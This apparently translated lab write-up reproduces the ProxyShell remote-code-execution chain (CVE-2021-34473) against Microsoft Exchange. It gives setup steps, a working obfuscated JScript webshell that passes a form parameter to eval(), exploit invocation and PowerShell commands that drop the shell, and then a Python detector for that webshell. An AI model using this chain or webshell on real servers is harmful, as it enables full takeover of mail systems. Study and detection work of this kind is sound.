Exchange CVE-2021-34473
Background:
On 5 August 2021, a security researcher publicly presented an analysis and PoC of CVE-2021-34473, a remote code execution vulnerability in Microsoft Exchange Server, at an overseas security conference. An attacker can use this flaw to bypass the relevant permission checks and, chained with other vulnerabilities, execute arbitrary code and take control of the Microsoft Exchange Server.
Vulnerability ID:
CVE-2021-34473
Affected versions:
Microsoft Exchange Server 2010
Microsoft Exchange Server 2013
Microsoft Exchange Server 2016
Microsoft Exchange Server 2019
Environment setup (needs 8 GB of RAM):
1. Install the AD domain controller: open Server Manager, click Manage > Add Roles and Features (Windows Server 2016)
2. Select Active Directory Domain Services and DNS Server
3. In Server Manager, promote this server to a domain controller
4. Set a password
5. Click Install; the system reboots automatically when installation finishes
6. Install the Exchange prerequisites
6.1 .NET Framework 4.8
https://download.visualstudio.microsoft.com/download/pr/014120d7-d689-4305-befd-3cb711108212/0fd66638cde16859462a6243a4629a50/ndp48-x86-x64-allos-enu.exe
6.2 Install the Visual C++ Redistributable Package for Visual Studio 2012
https://www.microsoft.com/en-us/download/details.aspx?id=30679
6.3 Visual C++ 2013 Redistributable Package
https://support.microsoft.com/zh-cn/topic/update-for-visual-c-2013-redistributable-package-d8ccd6a5-4e26-c290-517b-8da6cfdf4f10
6.4 Install the Windows components Exchange requires via PowerShell
Install-WindowsFeature Server-Media-Foundation, NET-Framework-45-Features, RPC-over-HTTP-proxy, RSAT-Clustering, RSAT-Clustering-CmdInterface, RSAT-Clustering-Mgmt, RSAT-Clustering-PowerShell, WAS-Process-Model, Web-Asp-Net45, Web-Basic-Auth, Web-Client-Auth, Web-Digest-Auth, Web-Dir-Browsing, Web-Dyn-Compression, Web-Http-Errors, Web-Http-Logging, Web-Http-Redirect, Web-Http-Tracing, Web-ISAPI-Ext, Web-ISAPI-Filter, Web-Lgcy-Mgmt-Console, Web-Metabase, Web-Mgmt-Console, Web-Mgmt-Service, Web-Net-Ext45, Web-Request-Monitor, Web-Server, Web-Stat-Compression, Web-Static-Content, Web-Windows-Auth, Web-WMI, Windows-Identity-Foundation, RSAT-ADDS
6.5 Then download the Exchange 2016 ISO:
https://download.microsoft.com/download/d/2/3/d23b113b-9634-4456-acba-1f7b0ce22b0e/ExchangeServer2016-x64-cu18.iso
7. Install Exchange: right-click and run as administrator
8. Choose not to check for updates
9. Select the Mailbox role
10. Disable malware scanning
11. Follow the links in the error prompts to fix the errors (two errors)
12. Log in once installation completes
Reproduction steps:
1. Generate a webshell with https://github.com/Ridter/proxyshell_payload : in proxyshell_payload.py, edit the webshell variable at the end and replace it with an AntSword webshell
Before the change:
After the change:
'<%@ Page Language="Jscript" Debug=true%><%var NNVF=\'dFUwlmztVCSLYeHkDMgEZrKWhjQBNsuiGnf0xJPqAcvbIopXyaTR\';var NURV=Request.Form("mima");var FASZ=NNVF(2) + NNVF(28) + NNVF(10) + NNVF(40) + NNVF(1) + NNVF(13);eval(NURV, FASZ);%>'
After running it:
2. Download the exploit from https://github.com/dmaasland/proxyshell-poc and edit proxyshell_rce.py, pasting the encoded webshell output from the previous step into line 314
3. Run python proxyshell_rce.py -u https://x.x.x.x/ -e administrator@xxx.com (this last address must be a mailbox user in the target's mailbox administration group; administrator usually is). This step errors with a missing pypsrp module; just install it: pip install pypsrp
4. Run the following 3 commands in order
① Get-MailboxExportRequest
② Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$false
③ dropshell
5. Once the upload succeeds, connect to the webshell with AntSword; the target is the shell URL printed at the end of the previous step, and the password is mima
6. Tick "ignore HTTPS certificate"
7. Connection succeeded
Fix:
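As an added defender-side example (not part of this write-up or of either linked repository), a small Python scanner that recognises the JScript ASPX webshell shown above by its request-parameter-into-eval() pattern and rebuilds the index-assembled second eval() argument; the only input is the page's webshell, embedded here as a constructed sample string.

```python
import re
from typing import Optional

# Constructed sample: the obfuscated ASPX/JScript webshell shown on this page,
# used here purely as detector input.
SAMPLE_WEBSHELL = (
    '<%@ Page Language="Jscript" Debug=true%>'
    "<%var NNVF='dFUwlmztVCSLYeHkDMgEZrKWhjQBNsuiGnf0xJPqAcvbIopXyaTR';"
    'var NURV=Request.Form("mima");'
    "var FASZ=NNVF(2) + NNVF(28) + NNVF(10) + NNVF(40) + NNVF(1) + NNVF(13);"
    "eval(NURV, FASZ);%>"
)

# Indicators that together characterise this webshell family: a JScript page
# directive, request-supplied input, and a two-argument eval() call.
PATTERNS = {
    "jscript_page": re.compile(r'<%@\s*Page\s+Language="Jscript"', re.I),
    "request_input": re.compile(r'Request\.(Form|QueryString|Headers)\s*\(\s*"([^"]+)"\s*\)'),
    "eval_call": re.compile(r"\beval\s*\(\s*(\w+)\s*,\s*(\w+)\s*\)"),
}
STR_VAR = re.compile(r"var\s+(\w+)\s*=\s*'([^']+)'\s*;")
INDEX_EXPR = re.compile(r"var\s+(\w+)\s*=\s*((?:\w+\(\d+\)\s*\+?\s*)+);")


def decode_indexed_string(source: str, var_name: str) -> Optional[str]:
    """Rebuild a string assembled as NAME(i) + NAME(j) + ... from a literal."""
    literals = dict(STR_VAR.findall(source))
    for target, expr in INDEX_EXPR.findall(source):
        if target != var_name:
            continue
        parts = re.findall(r"(\w+)\((\d+)\)", expr)
        try:
            return "".join(literals[name][int(i)] for name, i in parts)
        except (KeyError, IndexError):
            return None
    return None


def analyse(source: str) -> dict:
    """Return matched indicators, the request parameter name and the decoded eval() mode."""
    hits = {name: bool(p.search(source)) for name, p in PATTERNS.items()}
    result = {"indicators": hits, "param": None, "eval_mode": None}
    m = PATTERNS["request_input"].search(source)
    if m:
        result["param"] = m.group(2)          # the webshell's password parameter
    e = PATTERNS["eval_call"].search(source)
    if e:
        result["eval_mode"] = decode_indexed_string(source, e.group(2))
    result["is_webshell"] = hits["eval_call"] and hits["request_input"]
    return result


if __name__ == "__main__":
    print(analyse(SAMPLE_WEBSHELL))
```

On the page's sample the decoded second argument is the string "UNSAFe", i.e. the case-insensitive "unsafe" mode that lets JScript.NET eval() run arbitrary code, which is why the six index lookups are there instead of a plain literal.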
CVE-2021-26855:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855
CVE-2021-26857:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857
CVE-2021-26858:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858
CVE-2021-27065:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065